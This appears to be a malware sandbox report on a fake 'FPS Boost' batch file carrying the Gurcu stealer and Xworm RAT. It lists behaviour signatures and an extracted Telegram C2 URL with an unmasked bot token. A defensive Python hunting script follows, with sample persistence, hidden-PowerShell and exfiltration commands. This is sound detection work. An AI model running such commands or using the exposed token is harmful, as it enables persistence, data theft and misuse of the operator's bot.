General

  • Target

    FPS Boost 1.bat.zip

  • Size

    4KB

  • Sample

    241022-pzjmksvhpa

  • MD5

    f606e366fe37903c4c0371dac16605de

  • SHA1

    826e9869acc36c9f5befd821b57282720ffb4113

  • SHA256

    a2ff096d30c78db38eaddf0629b7f26ce36b64588a2ae05b7b9c2a7e9fbe2c05

  • SHA512

    a2cfa60e7aec6ccd4a361443d5f66d74dd7cd90bd9f0d1c5b4fda7a363988b180b645a55eec56efaea19379dfb9bceafc5d36b7b49332677c4330095bcae7555

  • SSDEEP

    96:d1ASURY4tkC2avn9d45zF4mc52F3UFW2dGpxzx9p+7tex3v:vUR7SC2abyc52FEFPURowx3v

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7278641970:AAEHOVYteJH3T-Bg5zEPMUSj6sdFforQUZw/sendMessag

Targets

    • Target

      FPS Boost 1.bat.zip

    • Detect Xworm Payload

    • Gurcu, WhiteSnake

      Gurcu (also tracked as WhiteSnake) is an information stealer written in C#.

    • Modifies visibility of file extensions in Explorer

    • Modifies visibility of hidden/system files in Explorer

    • UAC bypass

    • Xworm

      Xworm is a remote access trojan written in C#.

    • Blocklisted process makes network request

    • Boot or Logon Autostart Execution: Active Setup

      Adversaries may achieve persistence by adding a Registry key under Active Setup (Installed Components) on the local machine; its StubPath command runs at user logon.

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden (-WindowStyle Hidden).

    • Drops file in Drivers directory

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory
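The rules below are an added example and not part of the sandbox report or the malware: they turn the signature list above and the Telegram C2 from "Malware Config" into hunting logic over process and network telemetry. The registry key paths (Explorer\Advanced, Active Setup\Installed Components) are real Windows locations; the sample events, the component GUID, file paths, bot token and the list of IP-lookup hosts are constructed or assumed. The bot token in an extracted Telegram C2 URL is a live credential for the operator's bot, so the helper masks it before it is written into a report.

```python
"""Hunting rules for the sandbox behaviours above (added example, not the report's logic)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Finding:
    rule: str
    process: str
    detail: str


# Real registry locations behind two of the signatures. The write can arrive via
# reg.exe, PowerShell or a direct API call, so rules match key path + value name.
EXPLORER_ADVANCED = r"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
ACTIVE_SETUP = r"Software\\Microsoft\\Active Setup\\Installed Components\\"

RULES = {
    # "Runs PowerShell with its display window hidden": powershell.exe prefix-matches
    # its switches, so -w, -win and -WindowStyle all select the same parameter.
    "powershell_hidden_window": re.compile(
        r"\bpowershell(?:\.exe)?\b.*\s-w[a-z]*\s+hidden\b", re.IGNORECASE),
    # "Modifies visibility of file extensions / hidden files in Explorer".
    "explorer_visibility_tamper": re.compile(
        EXPLORER_ADVANCED + r".*\b(HideFileExt|Hidden|ShowSuperHidden)\b", re.IGNORECASE),
    # "Boot or Logon Autostart Execution: Active Setup": a StubPath under a new
    # component GUID is executed once per user at logon.
    "active_setup_stubpath": re.compile(
        ACTIVE_SETUP + r".*\bStubPath\b", re.IGNORECASE),
    # "Looks up external IP address via web service": the report does not name
    # the service, so this list of common lookup hosts is an assumption.
    "external_ip_lookup": re.compile(
        r"\b(api\.ipify\.org|ifconfig\.me|icanhazip\.com|ipinfo\.io)\b", re.IGNORECASE),
}

# Telegram Bot API C2 as seen in "Malware Config": /bot<numeric id>:<token>/<method>.
TELEGRAM_BOT_URL = re.compile(
    r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(\w+)", re.IGNORECASE)


def summarize_telegram_c2(text: str) -> Optional[dict]:
    """Split a Telegram bot C2 URL into bot id, masked token and API method.

    The numeric bot id is a shareable indicator; the token grants full control
    of the bot (getMe, getUpdates, ...), so only its first four characters survive.
    """
    m = TELEGRAM_BOT_URL.search(text)
    if not m:
        return None
    bot_id, token, method = m.groups()
    return {
        "bot_id": bot_id,
        "token_masked": token[:4] + "*" * (len(token) - 4),
        "method": method,
        "defanged": "hxxps://api[.]telegram[.]org/bot" + bot_id + ":<token>/" + method,
    }


def scan(events: List[Tuple[str, str]]) -> List[Finding]:
    """Run every rule over (process, telemetry line) pairs and return the hits."""
    findings = []
    for process, line in events:
        for name, rx in RULES.items():
            m = rx.search(line)
            if m:
                findings.append(Finding(name, process, m.group(0)[:80]))
        c2 = summarize_telegram_c2(line)
        if c2:
            findings.append(Finding("telegram_bot_c2", process, c2["defanged"]))
    return findings


# Constructed telemetry modelled on the signature list; GUID, paths and token are
# placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    ("cmd.exe", r"powershell -w hidden -ExecutionPolicy Bypass -File C:\Users\Public\fps.ps1"),
    ("reg.exe", r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 1 /f"),
    ("reg.exe", r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 2 /f"),
    ("reg.exe", r'reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{11111111-2222-3333-4444-555555555555}" /v StubPath /t REG_SZ /d C:\ProgramData\svc.exe /f'),
    ("svc.exe", "GET https://api.ipify.org/?format=text"),
    ("svc.exe", "POST https://api.telegram.org/bot1234567890:AAExampleTokenValueThatIsNotReal000/sendMessage"),
    ("explorer.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:28} {f.process:14} {f.detail}")
```

Each rule is deliberately anchored on the registry path or host, not on reg.exe, so the same logic works on Sysmon event 13 (registry value set) fields or on a PowerShell script block; the benign explorer.exe line produces no finding.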

MITRE ATT&CK Enterprise v15